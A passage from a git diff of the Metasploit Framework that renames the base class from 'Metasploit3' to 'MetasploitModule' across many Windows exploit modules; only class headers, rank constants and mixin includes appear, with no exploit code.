a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index bb08a5045c..0153ee50d5 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index 49bdb98f4c..dfcf1dc520 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 3659a25bcb..2e3d2d7d07 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 6639e8f9d1..8a4bfd3ca0 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index ae8957925b..2791b5a283 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index 1ea64e355b..4899cb1144 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 4a8e6d2e04..9da0341ab1 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 1360a3e0d3..4002ed40d9 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index 9dc542a090..d7ddb592f7 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/winlog_runtime_2.rb b/modules/exploits/windows/scada/winlog_runtime_2.rb index f77cd30561..9de15b89fe 100644 --- a/modules/exploits/windows/scada/winlog_runtime_2.rb +++ b/modules/exploits/windows/scada/winlog_runtime_2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb index 50988b7a1e..f382fc81ba 100644 --- a/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb index 18c48e6ff9..b1bcc632af 100644 --- a/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb index 5cef7ab51a..47e9e7e78f 100644 --- a/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb +++ b/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb index 4766596f52..a31338f38e 100644 --- a/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb +++ b/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 12e2bf20af..3802f613ea 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index c26d264abb..20e47d950e 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index ae66736206..1c21d15813 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/smb/generic_smb_dll_injection.rb b/modules/exploits/windows/smb/generic_smb_dll_injection.rb index 760bcfd6d2..f52e48a799 100644 --- a/modules/exploits/windows/smb/generic_smb_dll_injection.rb +++ b/modules/exploits/windows/smb/generic_smb_dll_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/group_policy_startup.rb b/modules/exploits/windows/smb/group_policy_startup.rb index 8157d00f14..9be37de7e0 100644 --- a/modules/exploits/windows/smb/group_policy_startup.rb +++ b/modules/exploits/windows/smb/group_policy_startup.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::SMB::Server::Share diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 67eaa9baf9..953fa13ed8 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client::Authenticated diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 2b1c6f7272..985fd2cbd7 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 817f32c8d2..2a8565ddab 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms04_011_lsass.rb b/modules/exploits/windows/smb/ms04_011_lsass.rb index 8c9150e72f..e2c4864fda 100644 --- a/modules/exploits/windows/smb/ms04_011_lsass.rb +++ b/modules/exploits/windows/smb/ms04_011_lsass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking # diff --git a/modules/exploits/windows/smb/ms04_031_netdde.rb b/modules/exploits/windows/smb/ms04_031_netdde.rb index 63bb2284c4..30f78db495 100644 --- a/modules/exploits/windows/smb/ms04_031_netdde.rb +++ b/modules/exploits/windows/smb/ms04_031_netdde.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms05_039_pnp.rb b/modules/exploits/windows/smb/ms05_039_pnp.rb index c607558b2b..1e15f4dbe4 100644 --- a/modules/exploits/windows/smb/ms05_039_pnp.rb +++ b/modules/exploits/windows/smb/ms05_039_pnp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb index ad523283c1..e62d26a6c1 100644 --- a/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb +++ b/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_025_rras.rb b/modules/exploits/windows/smb/ms06_025_rras.rb index 73bf7bd392..540a4b7b6f 100644 --- a/modules/exploits/windows/smb/ms06_025_rras.rb +++ b/modules/exploits/windows/smb/ms06_025_rras.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_040_netapi.rb b/modules/exploits/windows/smb/ms06_040_netapi.rb index 335165a58d..a5f6e127f5 100644 --- a/modules/exploits/windows/smb/ms06_040_netapi.rb +++ b/modules/exploits/windows/smb/ms06_040_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_066_nwapi.rb b/modules/exploits/windows/smb/ms06_066_nwapi.rb index 17b58d9077..59ddf4c93b 100644 --- a/modules/exploits/windows/smb/ms06_066_nwapi.rb +++ b/modules/exploits/windows/smb/ms06_066_nwapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Egghunter diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index e5104d14c2..c081217b06 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms06_070_wkssvc.rb b/modules/exploits/windows/smb/ms06_070_wkssvc.rb index 059ff04131..5d3cd7763f 100644 --- a/modules/exploits/windows/smb/ms06_070_wkssvc.rb +++ b/modules/exploits/windows/smb/ms06_070_wkssvc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Requires valid/working DOMAIN + DC include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb index 651de13296..c81a58727b 100644 --- a/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/smb/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb index a1e8de1191..5266629d75 100644 --- a/modules/exploits/windows/smb/ms08_067_netapi.rb +++ b/modules/exploits/windows/smb/ms08_067_netapi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb index 3cf78788c9..f8e71f3b7e 100644 --- a/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb +++ b/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb index 7afff33985..db5fdcb58e 100644 --- a/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/ms10_061_spoolss.rb b/modules/exploits/windows/smb/ms10_061_spoolss.rb index b1b688e620..69ce351e30 100644 --- a/modules/exploits/windows/smb/ms10_061_spoolss.rb +++ b/modules/exploits/windows/smb/ms10_061_spoolss.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/windows_error' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb index 780604be72..9aa9a57d6e 100644 --- a/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb +++ b/modules/exploits/windows/smb/ms15_020_shortcut_icon_dllloader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index b9c0a1baea..8796ac8402 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 7b7c816897..d9a46e9b37 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -15,7 +15,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 17727557a0..8bb4b2e71c 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Exploit mixins should be called first diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 869aa183ff..8f97d7ca0c 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -19,7 +19,7 @@ under: require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Server diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index ceea4829b0..c7f1e9259d 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 07925d6526..05e183e82e 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 27ac045d5b..36eba8502e 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 3fbf61a555..d045492849 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/njstar_smtp_bof.rb b/modules/exploits/windows/smtp/njstar_smtp_bof.rb index bbf06483f1..adcc1d5461 100644 --- a/modules/exploits/windows/smtp/njstar_smtp_bof.rb +++ b/modules/exploits/windows/smtp/njstar_smtp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/wmailserver.rb b/modules/exploits/windows/smtp/wmailserver.rb index 6d393979a1..6f91626838 100644 --- a/modules/exploits/windows/smtp/wmailserver.rb +++ b/modules/exploits/windows/smtp/wmailserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/smtp/ypops_overflow1.rb b/modules/exploits/windows/smtp/ypops_overflow1.rb index 3b8450c140..a0b88194a5 100644 --- a/modules/exploits/windows/smtp/ypops_overflow1.rb +++ b/modules/exploits/windows/smtp/ypops_overflow1.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb index d851559c2c..922a163785 100644 --- a/modules/exploits/windows/ssh/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freeftpd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index e53bb028ea..07333700de 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/freesshd_key_exchange.rb b/modules/exploits/windows/ssh/freesshd_key_exchange.rb index 57e154860a..4204c26d58 100644 --- a/modules/exploits/windows/ssh/freesshd_key_exchange.rb +++ b/modules/exploits/windows/ssh/freesshd_key_exchange.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssh/putty_msg_debug.rb b/modules/exploits/windows/ssh/putty_msg_debug.rb index 73b305f2a4..117a781436 100644 --- a/modules/exploits/windows/ssh/putty_msg_debug.rb +++ b/modules/exploits/windows/ssh/putty_msg_debug.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/securecrt_ssh1.rb b/modules/exploits/windows/ssh/securecrt_ssh1.rb index df985f1448..fd8cfaf959 100644 --- a/modules/exploits/windows/ssh/securecrt_ssh1.rb +++ b/modules/exploits/windows/ssh/securecrt_ssh1.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index 4f9dde83ce..344a6e8ba6 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/ssl/ms04_011_pct.rb b/modules/exploits/windows/ssl/ms04_011_pct.rb index 9a437f9cab..278eebb500 100644 --- a/modules/exploits/windows/ssl/ms04_011_pct.rb +++ b/modules/exploits/windows/ssl/ms04_011_pct.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 3106ce456d..4f7ccaf5fc 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh diff --git a/modules/exploits/windows/telnet/goodtech_telnet.rb b/modules/exploits/windows/telnet/goodtech_telnet.rb index ea55e3c541..05787a086f 100644 --- a/modules/exploits/windows/telnet/goodtech_telnet.rb +++ b/modules/exploits/windows/telnet/goodtech_telnet.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 9f54353a9c..5e870c2a45 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb index 49588e2655..117490b420 100644 --- a/modules/exploits/windows/tftp/distinct_tftp_traversal.rb +++ b/modules/exploits/windows/tftp/distinct_tftp_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index c8d78b0862..1809d64ee3 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/futuresoft_transfermode.rb b/modules/exploits/windows/tftp/futuresoft_transfermode.rb index 410c818099..27117793e5 100644 --- a/modules/exploits/windows/tftp/futuresoft_transfermode.rb +++ b/modules/exploits/windows/tftp/futuresoft_transfermode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb b/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb index 0e3e0d5811..935f681953 100644 --- a/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb +++ 